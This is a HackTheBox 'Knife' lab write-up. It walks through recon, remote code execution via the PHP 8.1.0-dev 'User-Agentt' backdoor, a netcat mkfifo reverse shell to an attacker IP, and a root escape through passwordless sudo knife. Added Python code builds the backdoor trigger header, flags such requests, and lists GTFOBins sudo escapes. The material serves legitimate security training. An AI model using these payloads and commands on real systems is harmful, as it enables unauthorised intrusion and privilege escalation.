HTB: Knife


Summary

Knife was a very simple machine. Inspecting the HTTP response headers from the web server showed it was running PHP 8.1.0-dev, a development build that shipped with a backdoor giving remote code execution through a crafted User-Agentt request header. The privilege escalation to root was just as simple: the knife binary could be run with sudo without a password, and knife has a GTFOBins entry, so a root shell was a single command away. So without further ado, let's jump into Knife from HackTheBox.

Recon

$cat nmap/initial.txt 
# Nmap 7.91 scan initiated Sun May 23 13:33:30 2021 as: nmap -A -oN nmap/initial.txt -vvv 10.10.10.242
Nmap scan report for 10.10.10.242
Host is up, received syn-ack (0.032s latency).
Scanned at 2021-05-23 13:33:31 BST for 10s
Not shown: 998 closed ports
Reason: 998 conn-refused
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| ssh-rsa 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
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGKC3ouVMPI/5R2Fsr5b0uUQGDrAa6ev8uKKp5x8wdqPXvM1tr4u0GchbVoTX5T/PfJFi9UpeDx/uokU3chqcFc=
|   256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJbkxEqMn++HZ2uEvM0lDZy+TB8B8IAeWRBEu3a34YIb
80/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 23 13:33:41 2021 -- 1 IP address (1 host up) scanned in 10.80 seconds

Then a full TCP port scan, which confirms that only 22 and 80 are open:

$cat nmap/all-ports 
# Nmap 7.91 scan initiated Sun May 23 13:38:45 2021 as: nmap -p- -oN nmap/all-ports --min-rate 10000 -vvv 10.10.10.242
Increasing send delay for 10.10.10.242 from 0 to 5 due to 458 out of 1525 dropped probes since last increase.
Warning: 10.10.10.242 giving up on port because retransmission cap hit (10).
Increasing send delay for 10.10.10.242 from 640 to 1000 due to 308 out of 1025 dropped probes since last increase.
Nmap scan report for knife.htb (10.10.10.242)
Host is up, received syn-ack (0.029s latency).
Scanned at 2021-05-23 13:38:45 BST for 15s
Not shown: 64779 closed ports, 754 filtered ports
Reason: 64779 conn-refused and 754 no-responses
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

Read data files from: /usr/bin/../share/nmap
# Nmap done at Sun May 23 13:39:00 2021 -- 1 IP address (1 host up) scanned in 15.15 seconds

Enumeration of Services

HTTP 80

Gobuster didn't find anything of use with either wordlist:

$cat gobuster-main-php.txt 
/index.php            (Status: 200) [Size: 5815]
┌─[purplerabbit@kali]─[~/Documents/htb/knife]
└──╼ $cat gobuster-main-raft.txt 
/index.php            (Status: 200) [Size: 5815]
/server-status        (Status: 403) [Size: 277]

Browsing to the web server shows a medical page on which none of the links work.

Since gobuster found nothing and the site itself had nothing of interest, I sent the request through Burp to look at the HTTP headers.

The X-Powered-By response header reveals that the server is running PHP/8.1.0-dev. A "-dev" version string on a production web server is worth a search on its own; in this case it identifies a very specific, very bad build.

Shell as James

Searching searchsploit for this version turns up a remote code execution exploit:

$searchsploit php dev 8.1
------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                      |  Path
------------------------------------------------------------------------------------ ---------------------------------
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution                                 | php/webapps/49933.py
------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

Copying this script and running it with the URL of the web server gives a shell as james on the machine:

$python3 49933.py 
Enter the full host url:
http://10.10.10.242/index.php

Interactive shell is opened on http://10.10.10.242/index.php 
Can't acces tty; job crontol turned off.
$ id
uid=1000(james) gid=1000(james) groups=1000(james)

$ whoami
james
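The exploit above works because of a backdoor in the PHP 8.1.0-dev source: at request startup the zlib extension reads the non-standard User-Agentt header and, if the value contains the string "zerodium", evaluates everything after those eight characters as PHP. The following is an added example, not the 49933.py script from the writeup, showing how the trigger header is built, how the command output is separated from the page body, and a small classifier that flags such requests on the defensive side. The TARGET URL is the box address from the writeup; the sample request headers are constructed for the example.

```python
"""Added example: PHP 8.1.0-dev User-Agentt backdoor, offensive and defensive view.

Not the page's exploit script. TARGET is the writeup's URL (assumption: adjust for
your target); SAMPLE_REQUESTS are constructed header sets, not captured traffic.
"""
import urllib.request

TARGET = "http://10.10.10.242/index.php"
TRIGGER = "zerodium"  # magic string the backdoored ext/zlib looks for (strstr, case-sensitive)


def backdoor_headers(cmd: str) -> dict:
    """Build the request header that makes the backdoor run `cmd` via system().

    The backdoor evals the header value from offset 8 onwards, so the magic word must
    sit at the very start for the remainder to be valid PHP. Single quotes in cmd are
    escaped so they cannot break out of the PHP string literal.
    """
    php = "system('" + cmd.replace("'", "\\'") + "');"
    return {"User-Agentt": TRIGGER + php}


def extract_output(body: str) -> str:
    """The eval runs in RINIT, before index.php executes, so the command output is
    written before the page's HTML. Everything up to the doctype is the command output."""
    return body.split("<!DOCTYPE", 1)[0]


def run_cmd(cmd: str, url: str = TARGET, timeout: float = 10.0) -> str:
    """Send one command to the target and return its output (network call; not used by tests)."""
    req = urllib.request.Request(url, headers=backdoor_headers(cmd))
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return extract_output(resp.read().decode(errors="replace"))


def classify_request(headers: dict) -> str:
    """Defensive check over a request's headers.

    No real client sends a header named User-Agentt, so its mere presence is
    'suspicious'; presence of the magic string means the backdoor would fire ('trigger').
    """
    for name, value in headers.items():
        if name.lower() == "user-agentt":
            return "trigger" if TRIGGER in value else "suspicious"
    return "benign"


SAMPLE_REQUESTS = [  # constructed examples, not captured from the box
    {"Host": "knife.htb", "User-Agent": "Mozilla/5.0"},
    {"Host": "knife.htb", "User-Agentt": "zerodiumsystem('id');"},
    {"Host": "knife.htb", "user-agentt": "curl/7.74.0"},
]


if __name__ == "__main__":
    for req_headers in SAMPLE_REQUESTS:
        print(classify_request(req_headers), req_headers)
    # Against the live box this returns the output of `id`, as in the writeup:
    # print(run_cmd("id"))
```

Because the trigger is a request header rather than anything in the URL or body, a default Apache access log (which records User-Agent but not User-Agentt) will not show it; detection needs a proxy, WAF or a LogFormat that captures the header, and the server-side fix is simply not to run a development build of PHP.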

The exploit's pseudo-shell is not a real tty, so I used netcat to send a reverse shell back to my machine and then upgraded it to a fully interactive tty:

$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.91 4444 >/tmp/f

In the netcat listener I then used the Python pty trick to get a fully interactive shell as James (backgrounding the shell with Ctrl-Z and running stty raw -echo followed by fg on the listener side additionally gives tab completion and Ctrl-C handling):

$ python3 -c 'import pty;pty.spawn("/bin/bash");' 

─[purplerabbit@kali]─[~/Documents/htb/knife]
nc -lvp 4444
ls
bin   cdrom  etc   lib    lib64   lost+found  mnt  proc  run   snap  sys  usr
boot  dev    home  lib32  libx32  media       opt  root  sbin  srv   tmp  var
james@knife:/$ cd home

James => Root

Checking which commands James can run through sudo shows that he can run knife as root, and without a password:

james@knife:/tmp$ sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

GTFOBins (https://gtfobins.github.io/gtfobins/knife/#sudo) shows this is exploitable. knife exec -E evaluates an arbitrary Ruby string inside the knife process, so passing it exec "/bin/sh" replaces the root-owned knife process with a root shell:

sudo knife exec -E 'exec "/bin/sh"'

Running this command gives root on the machine:

james@knife:/tmp$ sudo knife exec -E 'exec "/bin/sh"'
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
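The sudo -l step above is the check worth automating on every Linux foothold: parse the output, then compare each binary against the GTFOBins sudo entries. The following is an added example, not part of the writeup; it embeds the box's sudo -l output as sample input, and SHELL_ESCAPES is a small constructed subset of GTFOBins entries rather than the full catalogue.

```python
"""Added example: parse `sudo -l` output and flag binaries with known sudo shell escapes.

Not from the writeup. SUDO_L_OUTPUT is the output shown on the page; SHELL_ESCAPES is a
constructed subset of GTFOBins sudo entries (assumption: only a handful are listed here).
"""
import re

SUDO_L_OUTPUT = """\
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
"""

# Constructed subset of GTFOBins sudo entries: binary name -> command that yields a shell.
SHELL_ESCAPES = {
    "knife": "sudo knife exec -E 'exec \"/bin/sh\"'",
    "vim": "sudo vim -c ':!/bin/sh'",
    "find": "sudo find . -exec /bin/sh \\; -quit",
    "less": "sudo less /etc/profile  (then type !/bin/sh)",
    "python3": "sudo python3 -c 'import os; os.system(\"/bin/sh\")'",
}

# One rule line: "(runas) [TAG: TAG: ...] /path/cmd [args][, /path/other ...]"
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text: str) -> list:
    """Return one dict per command entry: runas user, whether NOPASSWD is set, and the command."""
    entries = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True  # everything before this line is Defaults noise
            continue
        if not in_rules:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()  # "(root : root)" -> "root"
        tags = [t.rstrip(":") for t in m.group("tags").split()]
        for cmd in m.group("cmds").split(","):
            entries.append({"runas": runas, "nopasswd": "NOPASSWD" in tags, "command": cmd.strip()})
    return entries


def flag_escapes(entries: list) -> list:
    """Match the binary name of each root-capable entry against SHELL_ESCAPES.

    Note: an entry that pins the arguments (e.g. "/usr/bin/knife node list") may not be
    abusable the GTFOBins way; this check only looks at the binary, so treat hits as leads.
    """
    findings = []
    for e in entries:
        if e["runas"] not in ("root", "ALL"):
            continue
        binary = e["command"].split()[0].rsplit("/", 1)[-1]
        if binary in SHELL_ESCAPES:
            findings.append((e["command"], e["nopasswd"], SHELL_ESCAPES[binary]))
    return findings


if __name__ == "__main__":
    for command, nopasswd, escape in flag_escapes(parse_sudo_l(SUDO_L_OUTPUT)):
        print(f"{command} (NOPASSWD={nopasswd}) -> {escape}")
```

On the box this reports /usr/bin/knife with NOPASSWD set and prints the exact GTFOBins command used above. The same parser applies to real sudo -l output piped in from a shell; the only box-specific part is the embedded sample.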

That was knife from hackthebox! Hope you enjoyed!